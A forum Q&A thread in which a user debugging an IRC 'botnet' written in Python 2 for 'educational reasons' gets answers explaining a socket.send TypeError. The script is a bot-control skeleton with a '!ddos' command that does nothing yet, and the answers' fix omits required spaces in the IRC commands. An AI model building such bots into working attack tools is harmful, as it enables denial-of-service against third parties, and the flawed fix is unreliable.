# Getting a "TypeError: an integer is required" in my script

Tags: python, string, sockets, python-2.7, irc

I am trying to make a botnet using Python, for educational reasons, and I keep getting the following error:

> TypeError: an integer is required

Here is my script:

```
import os
import socket
import random
import string

# string.letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
a = random.choice(string.letters) 
b = random.choice(string.letters)
c = random.choice(string.letters)
d = random.choice(string.letters)   
e = random.choice(string.letters)
name = 'bot' + a + b + c + d + e

network = 'chat.freenode.net'
port = 6667
irc = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
irc.connect ( ( network, port ) )
print irc.recv ( 4096 )

irc.send ('NICK', name + '\r\n')
irc.send ( 'USER', name, name, name, ':Python IRC\r\n' )
irc.send ( 'JOIN #occult_hand\r\n' )
irc.send ( 'PRIVMSG #occult_hand :Hello World.\r\n' )

while True:
    data = irc.recv ( 4096 )
    if data.find ( 'PING' ) != -1:
        irc.send ( 'PONG ' + data.split() [ 1 ] + '\r\n' )
    if data.find ( '!shutdown' ) != -1:
        irc.send ( "PRIVMSG #occult_hand :Fine, if you don't want me\r\n" )
        irc.send ( 'QUIT\r\n' )
    if data.find ( '!list' ) != -1:
        irc.send ( 'PRIVMSG #occult_hand :' + name, 'ONLINE\r\n' )
    if data.find ( '!ddos' ) != -1:
        irc.send ( 'PRIVMSG #occult_hand :Enter a target\r\n' )
    if data.find ( 'KICK' ) != -1:
        irc.send ( 'JOIN #occult_hand\r\n' )
    if data.find ('cheese') != -1:
        irc.send ( 'PRIVMSG #occult_hand :WHERE!!!!!!\r\n' )
    print data
```

Comment: Please format your code and post the full traceback

Comment: Which line throws the error?

Answer (score 0, accepted):

I looked up for this issue, seems like you should put a integer ( UNIX socket constant ) there to let it work, but from your later code, I assume you just want to give messages but this optional parameter, so you could change

```
irc.send ('NICK', name + '\r\n')
irc.send ( 'USER', name, name, name, ':Python IRC\r\n' )
```

to

```
irc.send ('NICK' + name + '\r\n')
irc.send ( 'USER' + name + name + name + ':Python IRC\r\n' )
```

I guess you're mixing `python`'s string concatenation operator `+` with `,` from some other languages :)
I tested the changed version in my box, it won't cause the error anymore, though I still don't know what this code does, could you please explain a bit :)

Answer (score 1):

The script errors on line 21, `irc.send('NICK', name + '\r\n')`:

```
Traceback (most recent call last):
  File "botnet.py", line 21, in 
    irc.send('NICK', name + '\r\n')
TypeError: an integer is required
```

It's because the `socket.send` method has the following signature, as per the [docs](https://docs.python.org/2/library/socket.html#socket.socket.send):

```
socket.send(string[, flags])
```

The `string` argument is the data to be sent. The `flags` argument is the optional flags, that are the same as described in Unix `man 2 recv`. See http://man7.org/linux/man-pages/man2/recv.2.html for details.

Basically, the `flags` argument is an integer value and defaults to `0`. The flag values, as described by Unix man page, are available in the `socket` module as constants and you get the value by combining the required flag values using an OR logical operation, e.g.:

```
socket.send(data, flags=socket.MSG_OOB | socket.MSG_DONTROUTE)
```

To fix your script, you have to concatenate all the data you want to send into one string, and pass that as the first argument to the `socket.send` method everywhere:

```
irc.send('NICK' + name + '\r\n')
irc.send('USER' + name + name + name + ':Python IRC\r\n')
# ...
```

Answer (score 0):

Please post the actual error message.
For now what I can say is that you should have another look at your send method. For example, with

```
irc.send ('NICK', name + '\r\n')
```

you are passing two strings to `send`. According to 
https://docs.python.org/2/library/socket.html
and

```
man 2 recv
```

the flag argument(s) must be integer.